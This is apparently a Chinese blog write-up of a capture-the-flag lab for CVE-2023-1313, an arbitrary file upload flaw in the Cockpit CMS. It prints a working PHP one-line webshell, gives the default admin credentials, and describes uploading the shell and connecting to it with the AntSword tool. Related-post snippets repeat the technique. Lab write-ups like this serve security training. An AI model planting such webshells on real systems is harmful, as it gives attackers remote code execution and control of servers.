CVE-2023-1313

fasewer

于 2024-07-31 22:42:57 发布

阅读量233

点赞数 3

文章标签：网络安全

本文链接：https://blog.csdn.net/a666666688/article/details/140834207

版权

开启靶场

url访问/install来运行安装

http://eci-2ze0wqx38em0qticuhug.cloudeci1.ichunqiu.com/install/

得知其用户和密码为admin

查找文件上传位置

上传一句话木马文件

<?php echo phpinfo();@eval($_POST['flw']);?>

下载查看上传木马路径

复制路径

/storage/uploads/2024/07/31/3_uid_66aa253f9a377.php

使用蚁剑连接

连接的就是上面这个url

http://eci-2ze0wqx38em0qticuhug.cloudeci1.ichunqiu.com/storage/uploads/2024/07/31/1_uid_66aa34754ca41.php

查找flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

fasewer

关注关注

3
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
CVE-2023-1313

得知其用户和密码为admin。
复制链接

扫一扫

Cockpit upload文件上传漏洞（CVE-2023-1313）

0xSec

12-16

1820

Cockpitassetsmanager/upload接口处存在文件上传漏洞，攻击者可通过该漏洞在服务器端任意上传代码，写入后门，获取服务器权限，进而控制整个web服务器。

春秋云境CVE-2023-1313

m0_64432806的博客

03-27

695

春秋云境CVE-2023-1313 cockpit在2.4.1版本之前存在任意文件上传漏洞PS：通过在浏览器中打开/install来运行安装

参与评论您还未登录，请先登录后发表或查看评论

春秋云镜 CVE-2023-1313

qq274575499的博客

04-03

987

cockpit在2.4.1版本之前存在任意文件上传漏洞PS：通过在浏览器中打开/install来运行安装。

春秋云镜 CVE-2023-1313 WP

m0_73649671的博客

04-17

578

春秋云镜 CVE-2023-1313 WP 介绍：cockpit在2.4.1版本之前存在任意文件上传漏洞PS：通过在浏览器中打开/install来运行安装。

春秋云镜 CVE-2023-1313(*)

m0_62363483的博客

06-01

319

至于为什么想到把php这三个字去掉，这也是我反复尝试弄出来的，因为我用一句话木马将php这三个字符去掉下载后的文件是空白的，这就形成了对比；我又将phpinfo函数把php去掉结果是一样的。如何我这样上传一句话木马：<?我们上传这个代码：<?跟第一个一样，你用蚁剑连还是不行。我们用蚁剑连接返回是空的。

春秋云境CVE-2023-1313，2024年最新2024网络安全最新大厂面试真题

2301_82242296的博客

04-20

519

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。

Goby 漏洞发布｜Cockpit 平台 upload 文件上传漏洞（CVE-2023-1313）

m0_46699477的博客

09-28

823

Cockpit 是一个自托管、灵活且用户友好的无头内容平台，用于创建自定义数字体验。Cockpit 存在文件上传漏洞，攻击者可上传任意文件，进而导致服务器被控制等。

春秋云境-CVE-2023-2130

dsasdasdd的博客

04-13

294

题目描述：在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。发现有回显，直接sqlmap爆破数据库。url输入id=1 看有没有回显。进入他提示的组件位置。

Ccockpit文件上传漏洞（CVE-2023-1313）

最新发布

2201_75569982的博客

07-31

117

输入账号和密码 admin admin。

CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁

01-19

针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 ：在管理接口上执行经过身份验证的（低特权）远程代码 CVE-2023-6549：拒绝服务 2、强烈建议受影响...

CVE-2023-25157-main(1).zip

07-19

在此次描述的案例中，我们关注的是CVE-2023-25157，这是一个针对GeoServer的SQL注入漏洞。 **SQL注入** 是一种常见的网络安全攻击手段，攻击者通过构造恶意的SQL语句来欺骗数据库管理系统，从而获取未经授权的数据...

cve-2023-1454

04-24

漏洞描述： JeecgBoot是一款基于代码生成器的低代码开发平台。企业Web应用程序的Java低代码平台JEECG-Boot（v3.5.0）最新未经授权的SQL注入。影响范围：攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息...

OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1

10-17

在2023年，OpenSSH发现了一个名为CVE-2023-38408的安全漏洞，这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作，对系统安全构成威胁。为了保护您的系统不受此漏洞影响，及时升级到OpenSSH 9.5p1...

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8354

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

Datacom-HCIA认证全套课件

07-30

Datacom-HCIA认证全套课件完整的，不错 HC110110001 传输介质简介.pptx HC110110002 以太网帧结构.pptx HC110110003 IP编址.pptx HC110110004 ICMP协议.pptx HC110110005 ARP协议.pptx HC110110006 传输层协议.pptx HC110110007 数据转发过程.pptx HC110110008 VRP基础.pptx HC110110009 命令行基础.pptx HC110110010 文件系统基础.pptx HC110110011 VRP系统管理.pptx HC110110012 交换网络基础.pptx HC110110013 STP原理与配置.pptx

基于tp5的校园生活系统.zip

07-30

基于tp5的校园生活系统.zip

C++技术资料分享17重要培训技术资料.zip

07-30

C++技术资料分享17重要培训技术资料.zip